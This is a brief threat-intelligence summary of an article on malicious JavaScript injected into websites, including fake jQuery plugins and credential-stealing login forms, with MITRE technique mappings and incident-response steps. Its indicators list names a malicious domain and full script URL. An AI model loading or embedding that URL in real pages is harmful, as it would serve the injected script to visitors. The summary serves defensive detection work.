Threat Research

Malicious JQuery & JavaScript – Threat Detection & Incident Response – Security Investigation

Securonix

The article explains how attackers exploit jQuery and JavaScript to inject malicious code into legitimate websites, including disguising malware as legitimate jQuery plugins and stealing credentials through deceptive login forms. It also outlines an incident response plan with steps for identification, containment, analysis, eradication, recovery, and lessons learned. #jQuery #findtrustclicks #CyberChef #VirusTotal

Keypoints

  • Attackers inject malicious JavaScript into legitimate websites, often via vulnerabilities in content management systems.
  • Malware can be disguised as legitimate jQuery plugins to mislead site owners and users.
  • A fake login form is used to capture credentials by presenting a credential-stealing web form.
  • HTTP 3XX redirects to unknown domains indicate likely C2 activity and data exfiltration channels.
  • Payloads are obfuscated/encoded and decoded—CyberChef is used to decipher data and reveal payloads.
  • The investigation traces a malicious domain (record.findtrustclicks.com) and checks results in VirusTotal, highlighting suspicious infrastructure.
  • Root causes include outdated plugins and unpatched components; emphasizes ongoing incident response planning and plan updates.

MITRE Techniques

  • [T1059.007] JavaScript – “The attackers inject malicious JavaScript code into legitimate websites, often through vulnerabilities in the website’s content management system.”
  • [T1036] Masquerading – “disguising it as a legitimate jQuery plugin.”
  • [T1056.003] Web Form – “adds a form to a website that looks like a login form, but actually sends the user’s credentials to a server controlled by the attacker.”
  • [T1071.001] Web Protocols – “suspicious HTTP redirection status codes such as (3XX) to unknown domains.”
  • [T1027] Obfuscated/Compressed Files or Information – “Kim used the cyberchef tool to decipher the numbers above.”

Indicators of Compromise

  • [Domain] Malicious domain used for C2 – record.findtrustclicks.com, and record.findtrustclicks.com/state.js?v=2.6.6
  • [URL] Full malicious URL – https://record.findtrustclicks.com/state.js?v=2.6.6
  • [File name] Malicious script file – state.js

Read more: https://www.socinvestigation.com/malicious-jquery-javascript-threat-detection-incident-response/